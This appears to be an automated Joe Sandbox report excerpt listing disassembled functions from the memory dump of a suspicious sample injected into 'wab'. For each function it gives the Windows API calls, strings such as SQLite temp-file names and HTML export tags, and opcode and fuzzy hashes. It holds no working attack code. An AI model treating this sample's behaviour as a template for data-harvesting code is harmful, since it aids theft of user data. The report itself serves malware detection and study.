                                                    • Part of subcall function 00414592: RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                    • Part of subcall function 0040A9CE: ??3@YAXPAX@Z.MSVCRT ref: 0040A9DD
                                                  • memset.MSVCRT ref: 0040C439
                                                  • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                  • _wcsupr.MSVCRT ref: 0040C481
                                                    • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                    • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                                    • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                                    • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                                                  • memset.MSVCRT ref: 0040C4D0
                                                  • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,?), ref: 0040C508
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ??3@$EnumValuememset$CloseOpen_wcsuprmemcpywcslen
                                                  • String ID:
                                                  • API String ID: 1973883786-0
                                                  • Opcode ID: 7b1cc3e9e28870269e7e0e76d5f0a110d3188fcb9cf6d5cab2ec752ccc6f38bd
                                                  • Instruction ID: d2440758a7fd93b52fc88bd6111275bc9aa4df1ffeb01c53d5483546710cd2f3
                                                  • Opcode Fuzzy Hash: 7b1cc3e9e28870269e7e0e76d5f0a110d3188fcb9cf6d5cab2ec752ccc6f38bd
                                                  • Instruction Fuzzy Hash: A4411CB2900219BBDB00EF95DC85EEFB7BCAF48304F10417AB505F6191D7749A44CBA5
                                                  Function 004116DD Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 82COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • memset.MSVCRT ref: 004116FF
                                                    • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                    • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                    • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                                    • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                    • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                    • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                    • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                    • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                    • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                    • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4D2
                                                    • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                    • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4F3
                                                    • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                  • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                  • API String ID: 2618321458-3614832568
                                                  • Opcode ID: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                                  • Instruction ID: 2af34abd3473d77be096866f654b5876edf67c2d942e61680e34910f62553c8c
                                                  • Opcode Fuzzy Hash: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                                  • Instruction Fuzzy Hash: 71310DB1D013589BDB10EFA9DC816DDBBB4FB08345F10407BE548BB282DB385A468F99
                                                  Function 004185CA Relevance: 9.1, APIs: 6, Instructions: 78COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • memset.MSVCRT ref: 004185FC
                                                  • GetFileAttributesExW.KERNEL32(00000000,00000000,?), ref: 0041860A
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 00418650
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ??3@AttributesFilememset
                                                  • String ID:
                                                  • API String ID: 776155459-0
                                                  • Opcode ID: afcad17dad9998b86119828d1b617f81507b1c6ffb5a90d063004130875e5eff
                                                  • Instruction ID: e31a4ad29e7632976921f0390f19c15604a95804a640e9d04457ce0419b5f72c
                                                  • Opcode Fuzzy Hash: afcad17dad9998b86119828d1b617f81507b1c6ffb5a90d063004130875e5eff
                                                  • Instruction Fuzzy Hash: 1211E632A04115EFDB209FA49DC59FF73A8EB45318B21013FF911E2280DF789D8196AE
                                                  Function 004174F5 Relevance: 9.1, APIs: 6, Instructions: 61COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • AreFileApisANSI.KERNEL32 ref: 004174FC
                                                  • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
                                                  • malloc.MSVCRT ref: 00417524
                                                  • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 00417544
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 00417562
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ??3@ByteCharMultiWide$ApisFilemalloc
                                                  • String ID:
                                                  • API String ID: 2308052813-0
                                                  • Opcode ID: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                                                  • Instruction ID: 8d188238c5fd2fb6163cec5331830b967abe0ebba74b79ef9884251e0929a2bc
                                                  • Opcode Fuzzy Hash: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                                                  • Instruction Fuzzy Hash: 9701D4726081257BEB215B7A9C41DEF3AAEDF463B47210226FC14E3280EA38DD4141BD
                                                  Function 00418197 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 102COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetTempPathW.KERNEL32(000000E6,?,?,00417D63), ref: 004181DB
                                                  • GetTempPathA.KERNEL32(000000E6,?,?,00417D63), ref: 00418203
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 0041822B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: PathTemp$??3@
                                                  • String ID: %s\etilqs_$etilqs_
                                                  • API String ID: 1589464350-1420421710
                                                  • Opcode ID: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                                  • Instruction ID: b359b55a6514fc6c55a0405950767d5f88b37029f74eadb26d8a0dc7501745d5
                                                  • Opcode Fuzzy Hash: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                                  • Instruction Fuzzy Hash: 43313931A046169BE725A3669C41BFB735C9B64308F2004AFE881C2283EF7CDEC54A5D
                                                  Function 0040FD9E Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 57COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • memset.MSVCRT ref: 0040FDD5
                                                    • Part of subcall function 00414E7F: memcpy.MSVCRT ref: 00414EFC
                                                    • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                    • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                  • _snwprintf.MSVCRT ref: 0040FE1F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
                                                  • String ID: <%s>%s</%s>$</item>$<item>
                                                  • API String ID: 1775345501-2769808009
                                                  • Opcode ID: 3766bef419d6113f501c5e442c1acc564cf9e92440af78075bbd4ce4ba4e02a5
                                                  • Instruction ID: 102da8641e186e10bf8cf1b41b05db2e7c44eca872c9cddb12e5aab4d34b3b7e
                                                  • Opcode Fuzzy Hash: 3766bef419d6113f501c5e442c1acc564cf9e92440af78075bbd4ce4ba4e02a5
                                                  • Instruction Fuzzy Hash: 3111C131600219BBDB21AF65CC86E99BB65FF04348F00007AFD05676A2C779E968CBC9
                                                  Function 00414770 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • wcscpy.MSVCRT ref: 0041477F
                                                  • wcscpy.MSVCRT ref: 0041479A
                                                  • CreateFileW.KERNEL32(00000002,40000000,00000000,00000000,00000002,00000000,00000000,?,00000000,?,00411B67,?,General), ref: 004147C1
                                                  • CloseHandle.KERNEL32(00000000), ref: 004147C8
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: wcscpy$CloseCreateFileHandle
                                                  • String ID: General
                                                  • API String ID: 999786162-26480598
                                                  • Opcode ID: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                                                  • Instruction ID: 029e45c8424a23c50dbc4d8c1dfe1f9d14d00e2cf8bd1bf10ef2c4f99c7741b7
                                                  • Opcode Fuzzy Hash: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                                                  • Instruction Fuzzy Hash: 52F024B30083146FF7205B509C85EAF769CEB86369F25482FF05592092C7398C448669
                                                  Function 0040973C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 31windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ErrorLastMessage_snwprintf
                                                  • String ID: Error$Error %d: %s
                                                  • API String ID: 313946961-1552265934
                                                  • Opcode ID: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                                  • Instruction ID: 46023337ddced075b6ccb796d059e6b1f6412beb8ed51135551ede388a9512b7
                                                  • Opcode Fuzzy Hash: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                                  • Instruction Fuzzy Hash: C1F0A7765402086BDB11A795DC06FDA73BCFB45785F0404ABB544A3181DAB4EA484A59
                                                  Function 00435A61 Relevance: 7.9, APIs: 1, Strings: 4, Instructions: 394COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: foreign key constraint failed$new$oid$old
                                                  • API String ID: 0-1953309616
                                                  • Opcode ID: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                  • Instruction ID: 109d2bbf80905f1e2503505ff3b1f335ff26ebd6ff49ac5ca42eb4ed0232da3f
                                                  • Opcode Fuzzy Hash: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                  • Instruction Fuzzy Hash: 71E19271E00318EFDF14DFA5D882AAEBBB5EF08304F54406EE805AB351DB799A01CB65
                                                  Function 00431671 Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 231COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  • foreign key on %s should reference only one column of table %T, xrefs: 004316CD
                                                  • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
                                                  • unknown column "%s" in foreign key definition, xrefs: 00431858
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memcpy
                                                  • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                  • API String ID: 3510742995-272990098
                                                  • Opcode ID: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                  • Instruction ID: d29657cdd308451ad819b70b0710bc7d1770ace047979dc07f2e4ef1020519d4
                                                  • Opcode Fuzzy Hash: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                  • Instruction Fuzzy Hash: B7913E75A00205DFCB14DF99C481AAEBBF1FF49314F25815AE805AB312DB35E941CF99
                                                  Function 0044A6E0 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 84COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memcpymemset
                                                  • String ID: gj
                                                  • API String ID: 1297977491-4203073231
                                                  • Opcode ID: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                  • Instruction ID: b45f8a370873a883e9703370fbfe8b0477d3556cf02d11e6db591a78d085f858
                                                  • Opcode Fuzzy Hash: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                  • Instruction Fuzzy Hash: 95213DB67403002BE7209A39CC4165B7B6D9FC6318F0A481EF6464B346E67DD605C756
                                                  Function 0040E946 Relevance: 7.6, APIs: 5, Instructions: 60COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8EC
                                                    • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8FA
                                                    • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E90B
                                                    • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E922
                                                    • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E92B
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 0040E961
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 0040E974
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 0040E987
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 0040E99A
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 0040E9D3
                                                    • Part of subcall function 0040AA04: ??3@YAXPAX@Z.MSVCRT ref: 0040AA0B
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ??3@
                                                  • String ID:
                                                  • API String ID: 613200358-0
                                                  • Opcode ID: 2f3d1febb6567f1c65e15d924abe411323abe179da33a997404dc77986320892
                                                  • Instruction ID: 098569c1990a85f87ddbd530571c52e66e2f7ba0f471894b996c1416d461d1fd
                                                  • Opcode Fuzzy Hash: 2f3d1febb6567f1c65e15d924abe411323abe179da33a997404dc77986320892
                                                  • Instruction Fuzzy Hash: 5001A932A01A2097C665BB27A50195EB354BE86B24316896FF844773C1CB3C6C61C6DF
                                                  Function 0041748F Relevance: 7.6, APIs: 5, Instructions: 53COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • AreFileApisANSI.KERNEL32 ref: 00417497
                                                  • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                                                  • malloc.MSVCRT ref: 004174BD
                                                  • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 004174E4
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ByteCharMultiWide$??3@ApisFilemalloc
                                                  • String ID:
                                                  • API String ID: 2903831945-0
                                                  • Opcode ID: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                                                  • Instruction ID: 68224c9aa4b31b20fa5037399352f9c2f04b40a845063e8f60522cdb36b448b3
                                                  • Opcode Fuzzy Hash: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                                                  • Instruction Fuzzy Hash: DE01A4B150412DBEAF115FA99C80CAF7E7CEA463FC721422AF514E2290DA345E405AB9
                                                  Function 0040D441 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetParent.USER32(?), ref: 0040D453
                                                  • GetWindowRect.USER32(?,?), ref: 0040D460
                                                  • GetClientRect.USER32(00000000,?), ref: 0040D46B
                                                  • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                                                  • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: Window$Rect$ClientParentPoints
                                                  • String ID:
                                                  • API String ID: 4247780290-0
                                                  • Opcode ID: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                  • Instruction ID: 8744084584fea1eb3916f9079d499296a2dd08f7759f51c0708cf8f54c9212ed
                                                  • Opcode Fuzzy Hash: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                  • Instruction Fuzzy Hash: 62018836801129BBDB11EBA6CC49EFFBFBCFF06310F048069F901A2180D778A5018BA5
                                                  Function 00445093 Relevance: 7.5, APIs: 5, Instructions: 46COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                  • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                  • ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                                                  • memset.MSVCRT ref: 004450CD
                                                    • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 004450F0
                                                    • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                                                    • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F63
                                                    • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F75
                                                    • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F9D
                                                  • CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                                  • String ID:
                                                  • API String ID: 1471605966-0
                                                  • Opcode ID: 2aed10359402c50519c1c236b6adb34ede6eedef97d485569bed8d1556fc9971
                                                  • Instruction ID: af7e2442fb2a0afe256a59df9b01c6fa6c67666c78107f96d02934f32f814c95
                                                  • Opcode Fuzzy Hash: 2aed10359402c50519c1c236b6adb34ede6eedef97d485569bed8d1556fc9971
                                                  • Instruction Fuzzy Hash: D8F0C2765002107BE5207736AC8AEAB3A5CDF96771F11893FF416921D2EE698814C1BD
                                                  Function 0044474A Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 45COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • wcscpy.MSVCRT ref: 0044475F
                                                  • wcscat.MSVCRT ref: 0044476E
                                                  • wcscat.MSVCRT ref: 0044477F
                                                  • wcscat.MSVCRT ref: 0044478E
                                                    • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                    • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                                    • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?), ref: 00409AA5
                                                    • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
                                                  • String ID: \StringFileInfo\
                                                  • API String ID: 102104167-2245444037
                                                  • Opcode ID: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                                  • Instruction ID: e4f437c51a7ffcfb72b972a214432876dbdec8abc2c75880463b8380eb377783
                                                  • Opcode Fuzzy Hash: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                                  • Instruction Fuzzy Hash: 41018FB290021DB6EF10EAA1DC45EDF73BCAB05304F0004B7B514F2052EE38DB969B69
                                                  Function 0040E8E0 Relevance: 7.5, APIs: 5, Instructions: 41COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ??3@
                                                  • String ID:
                                                  • API String ID: 613200358-0
                                                  • Opcode ID: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                  • Instruction ID: 8b058f36177a858601f18eb469b8e3bd7c1df3fc7b9e847ab044313c89d6339d
                                                  • Opcode Fuzzy Hash: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                  • Instruction Fuzzy Hash: 98F012B25047015FD760AF6AA8C491BF3E9AB597147668C3FF149D3641CB38FC508A1C
                                                  Function 0040F508 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memcpy$??3@
                                                  • String ID: g4@
                                                  • API String ID: 3314356048-2133833424
                                                  • Opcode ID: 37ff6d91120af751e53e18efb23c18060f8529393ff4323a563ff9c980eac345
                                                  • Instruction ID: 6372a4083673351870aa2a156e9431cadfa41d37230e9e7fabcd635cb7c3c96e
                                                  • Opcode Fuzzy Hash: 37ff6d91120af751e53e18efb23c18060f8529393ff4323a563ff9c980eac345
                                                  • Instruction Fuzzy Hash: D2217A30900604EFCB20DF29C94182ABBF5FF447247204A7EE852A3B91E735EE119B04
                                                  Function 0040AAE3 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: _memicmpwcslen
                                                  • String ID: @@@@$History
                                                  • API String ID: 1872909662-685208920
                                                  • Opcode ID: 3ad5d2c3b3ee2b52e24687d5059668d8296d000cbab4a3a90200832106c23410
                                                  • Instruction ID: 0314511eba11a06c501d0b319d6753a7178557fc2485e08f734f24cb460fdfed
                                                  • Opcode Fuzzy Hash: 3ad5d2c3b3ee2b52e24687d5059668d8296d000cbab4a3a90200832106c23410
                                                  • Instruction Fuzzy Hash: F1F0CD3310471157D210DE199C41A2BF7F8DB813A5F11063FF991A31C2D739EC658657
                                                  Function 004100D7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • memset.MSVCRT ref: 004100FB
                                                  • memset.MSVCRT ref: 00410112
                                                    • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                    • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                  • _snwprintf.MSVCRT ref: 00410141
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memset$_snwprintf_wcslwrwcscpy
                                                  • String ID: </%s>
                                                  • API String ID: 3400436232-259020660
                                                  • Opcode ID: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                  • Instruction ID: d6b380c41b5e3e458bf6abeca455f552dea24a705517b0a2e3702c553642f250
                                                  • Opcode Fuzzy Hash: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                  • Instruction Fuzzy Hash: 9B01DBF3D0012977D730A755CC46FEA76ACEF45304F0000B6BB08B3186DB78DA458A99
                                                  Function 0040D553 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • memset.MSVCRT ref: 0040D58D
                                                  • SetWindowTextW.USER32(?,?), ref: 0040D5BD
                                                  • EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ChildEnumTextWindowWindowsmemset
                                                  • String ID: caption
                                                  • API String ID: 1523050162-4135340389
                                                  • Opcode ID: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                                  • Instruction ID: dcfab03f3ae0740f4c11e1fd8af26e22289cdce227bdcda27870e2dbaf68b2c3
                                                  • Opcode Fuzzy Hash: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                                  • Instruction Fuzzy Hash: 50F08131D0031876FB206B95CC4EB8A3268AB04744F000076BE04B61D2DBB8EA44C69D
                                                  Function 00401137 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                                                    • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                                                  • CreateFontIndirectW.GDI32(?), ref: 00401156
                                                  • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
